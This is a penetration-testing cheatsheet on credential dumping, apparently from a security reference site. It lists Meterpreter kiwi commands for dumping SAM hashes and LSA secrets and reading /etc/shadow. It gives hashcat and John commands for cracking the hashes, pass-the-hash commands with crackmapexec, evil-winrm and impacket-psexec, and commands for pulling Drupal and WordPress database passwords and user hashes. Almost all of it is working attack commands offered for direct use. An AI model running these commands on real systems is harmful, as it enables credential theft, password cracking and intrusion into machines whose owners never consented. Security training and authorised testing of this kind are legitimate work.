Command Palette

Search for a command to run...

Cheatsheets
PreviousNext

Credential Dumping

Windows - Kiwi (Meterpreter)

load kiwi
creds_all           # Dump all credentials at once
lsa_dump_sam        # SAM database - local account NTLM hashes
lsa_dump_secrets    # LSA secrets - DefaultPassword, service account passwords

Windows - LSA Secrets

lsa_dump_secrets can reveal the DefaultPassword - the plaintext password configured for auto-login:

lsa_dump_secrets
# Look for:
# DefaultDomainName: WORKGROUP
# DefaultUserName:   Administrator
# DefaultPassword:   <plaintext password>

Windows - SAM Dump Output

lsa_dump_sam
# Output format:
# RID  : 000001f4 (500)  User : Administrator  Hash NTLM: <hash>
# RID  : 000001f5 (501)  User : Guest
# RID  : 000003e8 (1000) User : <localuser>     Hash NTLM: <hash>
FieldDescription
RIDRelative ID - 500 = Administrator, 501 = Guest
Hash NTLM32-char hex hash - crack offline or use for PTH

Windows - hashdump

# Quick dump without kiwi (may fail without SYSTEM)
hashdump
run post/windows/gather/hashdump

Linux - /etc/shadow

cat /etc/shadow
# Hash format: $id$salt$hash
# $1$ = MD5, $5$ = SHA-256, $6$ = SHA-512
# Extract and crack
unshadow /etc/passwd /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt   # SHA-512 ($6$)
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Offline Hash Cracking - Hashcat

Hash TypeModeExample
NTLM (Windows)1000hashcat -m 1000 hashes.txt rockyou.txt
SHA-512crypt Linux1800hashcat -m 1800 hashes.txt rockyou.txt
Drupal 77900hashcat -m 7900 hashes.txt rockyou.txt
bcrypt3200hashcat -m 3200 hashes.txt rockyou.txt
MD50hashcat -m 0 hashes.txt rockyou.txt
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --show   # Show cracked results
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --force  # Force if GPU errors

Pass-the-Hash

CommandDescription
crackmapexec smb <IP> -u administrator -H <NTLM>SMB PTH.
crackmapexec winrm <IP> -u administrator -H <NTLM>WinRM PTH.
evil-winrm -i <IP> -u administrator -H <NTLM>evil-winrm PTH.
impacket-psexec administrator@<IP> -hashes :<NTLM>PSExec PTH.

Drupal / Web Application Credentials

# Drupal - credentials in settings.php
cat /var/www/html/sites/default/settings.php | grep -A 10 "'database'"
 
# Extract hashes from DB
mysql -u drupal -p<pass> -e "SELECT name, mail, pass FROM drupal.users;"
 
# WordPress - credentials in wp-config.php
cat /var/www/html/wordpress/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"
 
# WordPress - users from DB
mysql -u <user> -p<pass> -e "SELECT user_login, user_pass FROM wordpress.wp_users;"